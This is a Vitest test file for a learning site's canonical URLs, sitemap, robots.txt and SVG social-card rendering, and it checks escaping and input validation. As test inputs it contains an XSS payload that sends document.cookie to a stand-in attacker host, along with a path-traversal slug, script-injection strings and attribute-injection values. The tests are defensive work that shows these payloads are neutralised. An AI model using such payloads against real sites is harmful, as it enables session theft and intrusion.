/**
 * Public URLs, sitemaps and OG cards.  (P3-T6)
 *
 * ## The tests that matter
 *
 *  · `an SVG carrying a SCRIPT payload is inert` — the OG route serves user-authored titles
 *    into `image/svg+xml`, and a browser will EXECUTE a script in an SVG it navigates to. Link
 *    previewers do exactly that. This is the test that keeps the card a picture.
 *  · `the canonical path does not contain the subject` — asserted as a property, not a
 *    snapshot, because the reason is the argument in the module header: `moveSubject` is
 *    shipped, and a subject in the path breaks every URL beneath it.
 *  · `a sitemap and a canonical link are generated by the SAME function` — the failure is a
 *    sitemap listing a URL the page canonicalises elsewhere, which tells a crawler to index
 *    two different things.
 */
import { describe, expect, it } from 'vitest';
import { toSlug } from '../taxonomy/index.js';
import {
  absoluteUrl,
  canonicalResourcePath,
  clip,
  escapeXml,
  LIBRARY_PREFIX,
  renderOgImage,
  renderRobots,
  renderSitemap,
  SITEMAP_URL_LIMIT,
  sitemapLastmod,
} from './index.js';

const ORIGIN = 'https://orrery.example';

describe('P3-T6 canonical paths', () => {
  it('the canonical path does NOT contain the subject', () => {
    // The argument: `moveSubject` is a shipped, cycle-safe feature (P3-T1), and a subject in
    // the path means a reorganisation breaks the URL of every resource beneath it. Asserted as
    // a property because a snapshot of the string would pass just as happily if the subject
    // were added and the snapshot updated.
    const path = canonicalResourcePath('quadratics');
    expect(path).toBe('/library/quadratics');
    expect(path.startsWith(LIBRARY_PREFIX)).toBe(true);
    expect(path.split('/')).toHaveLength(3);
  });

  it('encodes a slug, so a stray separator cannot reshape the route', () => {
    // The slug is normally constrained to `[a-z0-9-]` by `toSlug`, but the value in the
    // database is not the same as the value that was validated, and a `/` in it would turn one
    // route into another.
    expect(canonicalResourcePath('a/b')).toBe('/library/a%2Fb');
    expect(canonicalResourcePath('a?b=1')).toBe('/library/a%3Fb%3D1');
    expect(canonicalResourcePath('../../etc/passwd')).toBe('/library/..%2F..%2Fetc%2Fpasswd');
  });

  it('the same slug yields the same path from every consumer', () => {
    // One function, three consumers. If this ever needs a second copy, the sitemap and the
    // `<link rel=canonical>` will disagree and a crawler will be told to index two things.
    const slug = toSlug("Snell's Law and Refraction");
    expect(slug.ok).toBe(true);
    if (!slug.ok) return;
    const path = canonicalResourcePath(slug.slug);
    expect(renderSitemap([{ path, lastmod: '2026-01-01' }])).toContain(
      `<loc>${escapeXml(path)}</loc>`,
    );
    expect(absoluteUrl(ORIGIN, path)).toBe(
      'https://orrery.example/library/snell-s-law-and-refraction',
    );
  });

  it('absoluteUrl normalises a trailing slash on the origin, and never doubles a separator', () => {
    expect(absoluteUrl('https://x.example/', '/a')).toBe('https://x.example/a');
    expect(absoluteUrl('https://x.example', '/a')).toBe('https://x.example/a');
    expect(absoluteUrl('https://x.example', 'a')).toBe('https://x.example/a');
  });
});

describe('P3-T6 robots.txt', () => {
  it('disallows the exam surface, because an attempt URL is a timed assessment', () => {
    // Not merely private: an attempt id is guessable, and indexing one leaks a running exam.
    const robots = renderRobots(ORIGIN);
    expect(robots).toContain('Disallow: /exam/');
    expect(robots).toContain('Allow: /');
  });

  it('points at a sitemap built from the SAME origin function', () => {
    // A hardcoded `Sitemap:` line is a second source of truth for where the site lives, and the
    // two disagree the first time a preview origin and a production origin differ.
    expect(renderRobots(`${ORIGIN}/`)).toContain('Sitemap: https://orrery.example/sitemap.xml');
    expect(renderRobots(ORIGIN)).toBe(renderRobots(`${ORIGIN}/`));
  });
});

describe('P3-T6 the sitemap', () => {
  it('is SORTED, so a byte-identical corpus produces a byte-identical file', () => {
    // A sitemap whose order changes every build is one crawlers refetch for no reason, and a
    // diff of two sitemaps is unreadable if the order is arbitrary.
    const entries = [
      { path: '/library/zebra', lastmod: '2026-01-01' },
      { path: '/library/apple', lastmod: '2026-01-02' },
      { path: '/library/mango', lastmod: '2026-01-03' },
    ];
    const a = renderSitemap(entries);
    const b = renderSitemap([...entries].reverse());
    expect(a).toBe(b);
    expect(a.indexOf('apple')).toBeLessThan(a.indexOf('mango'));
    expect(a.indexOf('mango')).toBeLessThan(a.indexOf('zebra'));
  });

  it('carries a DATE for lastmod, never a timestamp', () => {
    // A full timestamp makes crawlers re-fetch constantly, which is exactly the wrong pressure
    // on a platform whose content changes on publish.
    expect(sitemapLastmod(new Date('2026-03-04T05:06:07.008Z'))).toBe('2026-03-04');
    expect(
      renderSitemap([
        { path: '/library/a', lastmod: sitemapLastmod(new Date('2026-03-04T05:06:07Z')) },
      ]),
    ).toContain('<lastmod>2026-03-04</lastmod>');
  });

  it('an invalid lastmod becomes EMPTY, not an invented date and not a throw', () => {
    // A fabricated `lastmod` is a lie told to a crawler about when content changed. And it must
    // not THROW: `toISOString()` raises a RangeError on an invalid Date, which would take out
    // the whole file for one bad row rather than omitting one entry.
    expect(sitemapLastmod(new Date('nonsense'))).toBe('');
    expect(sitemapLastmod(new Date(Number.NaN))).toBe('');
    // And an empty one is omitted rather than emitted as `<lastmod></lastmod>`.
    expect(renderSitemap([{ path: '/library/a', lastmod: '' }])).not.toContain('<lastmod>');
  });

  it('escapes a path, and a hostile slug cannot break out of the document', () => {
    const xml = renderSitemap([
      { path: '/library/a"><script>alert(1)</script>', lastmod: '2026-01-01' },
    ]);
    expect(xml).not.toContain('<script>');
    expect(xml).toContain('&lt;script&gt;');
  });

  it('exports the protocol limit so a caller can notice it is close', () => {
    // 50,000 is the search engines' own cap. Past it the spec requires an INDEX of sitemaps,
    // and the way to find out you are past it is to have been able to see the number.
    expect(SITEMAP_URL_LIMIT).toBe(50_000);
  });

  it('a `<loc>` is whatever it is given, so the CALLER must make it absolute', () => {
    // The sitemap protocol has no "relative to the site you fetched this from". This function
    // is path-based on purpose -- it has no idea what a deployment is called -- and the bug it
    // invited was in the one layer between it and the wire, which nothing covered. Asserted here
    // so the contract is stated rather than implied: `renderSitemap` does NOT add an origin.
    expect(renderSitemap([{ path: '/library/a', lastmod: '2026-01-01' }])).toContain(
      '<loc>/library/a</loc>',
    );
    // Which means a caller who forgets produces a sitemap of relative URLs, silently.
    const absolute = renderSitemap([
      { path: absoluteUrl(ORIGIN, '/library/a'), lastmod: '2026-01-01' },
    ]);
    expect(absolute).toContain('<loc>https://orrery.example/library/a</loc>');
  });

  it('emits a declaration and a urlset, and is well-formed enough to parse', () => {
    const xml = renderSitemap([{ path: '/library/a', lastmod: '2026-01-01' }]);
    expect(xml.startsWith('<?xml version="1.0" encoding="UTF-8"?>')).toBe(true);
    expect(xml).toContain('<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">');
    expect(xml.trimEnd().endsWith('</urlset>')).toBe(true);
    // Balanced tags, checked rather than eyeballed.
    const opens = (xml.match(/<url>/gu) ?? []).length;
    const closes = (xml.match(/<\/url>/gu) ?? []).length;
    expect(opens).toBe(closes);
  });
});

describe('P3-T6 escaping', () => {
  it('escapes the five XML metacharacters', () => {
    expect(escapeXml(`<a href="x">&'`)).toBe('&lt;a href=&quot;x&quot;&gt;&amp;&apos;');
  });

  it('strips control characters that XML 1.0 cannot carry at all', () => {
    // A title containing U+0001 makes the document unparseable, and an unparseable sitemap is
    // one crawlers discard without saying so.
    const out = escapeXml(`a${String.fromCharCode(1)}b${String.fromCharCode(31)}c`);
    expect(out).toBe('abc');
    // …and the file itself is plain text, so the escapes are visible in review.
    expect(escapeXml('plain')).toBe('plain');
  });

  it('escapes the AMPERSAND first, or the others get double-escaped', () => {
    // The classic ordering bug: `&lt;` written as `&` → `&amp;` → `&amp;lt;` renders as the
    // literal text "&lt;" instead of "<".
    expect(escapeXml('&lt;')).toBe('&amp;lt;');
  });
});

describe('P3-T6 the OG card', () => {
  it('an SVG carrying a SCRIPT payload is INERT', () => {
    // The security test for this file. A server that returns `image/svg+xml` will EXECUTE a
    // script in it when the URL is navigated to directly — which is what a link preview
    // service, a messaging client, or a curious user does. A resource title is author-supplied
    // text, so this is reachable.
    const hostile = '</text><script>fetch("https://evil.example/"+document.cookie)</script><text>';
    const svg = renderOgImage({
      title: hostile,
      eyebrow: '<script>x</script>',
      accent: '#123456',
      kind: 'LESSON',
    });
    expect(svg).not.toContain('<script>');
    expect(svg).not.toContain('</text><script>');
    expect(svg).toContain('&lt;script&gt;');
  });

  it('rejects an accent that is not a colour, rather than interpolating it', () => {
    // The accent comes from `Subject.colour`, a free-text column. Interpolating an arbitrary
    // string into a `fill="…"` attribute is attribute injection, and the fallback must happen
    // here rather than in a caller that forgets.
    for (const bad of ['red;}</text><script>x</script>', 'url(#x)', '', '#fff', 'javascript:x']) {
      const svg = renderOgImage({ title: 't', eyebrow: null, accent: bad, kind: 'LESSON' });
      expect(svg, bad).toContain('fill="#334155"');
      expect(svg, bad).not.toContain('<script>');
    }
  });

  it('clips by CODE POINT, so an emoji is not cut in half', () => {
    // A card ending in U+FFFD is a visible bug that a byte-length check cannot see and a
    // code-point slice does.
    const emoji = '🌊'.repeat(40);
    const out = clip(emoji, 10);
    expect([...out]).toHaveLength(10);
    expect(out).not.toContain('�');
    expect(out.endsWith('…')).toBe(true);
  });

  it('collapses whitespace, so a multi-line title does not break the layout', () => {
    expect(clip('  two\n\nlines   here  ', 100)).toBe('two lines here');
  });

  it('is 1200x630, the size every consumer crops for', () => {
    const svg = renderOgImage({
      title: 'Tides',
      eyebrow: 'Physics',
      accent: '#0ea5e9',
      kind: 'QUIZ',
    });
    expect(svg).toContain('width="1200"');
    expect(svg).toContain('height="630"');
    expect(svg).toContain('viewBox="0 0 1200 630"');
    // The eyebrow is uppercased: it is a label, and subject names are stored title-cased.
    expect(svg).toContain('>PHYSICS<');
  });

  it('handles a resource with no subject at all', () => {
    // Every resource has a nullable `subjectId`, and an OG card is generated for all of them,
    // so "no subject" is a normal state and not an edge case.
    const svg = renderOgImage({ title: 'Untitled', eyebrow: null, accent: null, kind: 'LESSON' });
    expect(svg).toContain('>ORRERY<');
    expect(svg).toContain('Untitled');
  });

  it('carries an aria-label, so the card is not an image with no name', () => {
    const svg = renderOgImage({
      title: 'Refraction',
      eyebrow: 'Physics',
      accent: '#0ea5e9',
      kind: 'LESSON',
    });
    expect(svg).toContain('role="img"');
    expect(svg).toContain('aria-label="Refraction"');
  });
});
